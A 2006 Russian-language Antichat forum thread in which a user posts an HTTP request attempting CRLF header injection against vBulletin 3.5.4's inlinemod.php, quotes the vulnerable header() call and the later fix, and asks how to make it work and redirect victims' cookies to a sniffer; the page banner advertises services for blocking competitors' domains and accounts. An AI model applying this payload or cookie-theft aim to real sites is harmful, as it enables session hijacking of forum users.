Форум АНТИЧАТ - vBulletin 3.54 xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
vBulletin 3.54 xss

Опции темы

Поиск в этой теме

Опции просмотра

vBulletin 3.54 xss

29.09.2006, 23:22

moridin

Новичок

Регистрация: 07.07.2006

Сообщений: 5

Провел на форуме:
80247

Репутация: 1

Отправить сообщение для moridin с помощью ICQ

vBulletin 3.54 xss

помогите разобраться

Код:

POST /vb354/inlinemod.php HTTP/1.0 
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 
Content-Length: 93 
Accept: */* 
Accept-Language: en-us 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
Host: www.vulnerable.com 
Content-Type: application/x-www-form-urlencoded 

do=clearthread&url=lala2%0d%0aContent-Length:
%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%
0a%0d%0a

сделал небольшую форму с двумя полями do и url
через пост на форум передаю эти два параметра

do=clearthread
url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%
0a%0d%0a

место где все происходит в коде:

Код:

header("Location: $url", 0, 301);

как я понимаю, должно послаться два заголовка, location и content-type но на деле идут только location, в броузер кидает такую строку
http://127.0.0.1(форум на локал машине запущен)/lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

вместо %0d%0a пробовал передавать \n\r, но результат тот же

каким образом можно отправить 2 заголовка? что я делаю не так?
плюс символы < > " заменяются на " < >

отправить несколько заголовков думаю точно можно, иначе бы в версии 3.6.0 не сделали проверку

Код:

     if (strpos($url, "\r\n") !== false)
     {
          trigger_error("Header may not contain more than a single header, new line detected.", E_USER_ERROR);
     }

и еще, вместо lala2 можно было бы подставить адрес сниффера, но каким образом передать куки? что-то типа такого {$_COOKIE['member_id']} не работает, переменные не раскрываются

спасибо за внимание

30.09.2006, 04:20

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Верно! Хорошо мыслишь!

01.10.2006, 01:12

moridin

Новичок

Регистрация: 07.07.2006

Сообщений: 5

Провел на форуме:
80247

Репутация: 1

неужели никто не сталкивался с этим? или то, как эту дырку можно использовать, в приватном разделе..
если не трудно намекните хотя бы в каком направлении двигаться?
может быть есть другие хсс на данную версию?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Подскажите работающие Прокси!!!	ZzSnakezZ	Чаты	4	10.03.2005 23:10
Подскажите Proxy	$ZLO$	Болталка	3	06.02.2005 14:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход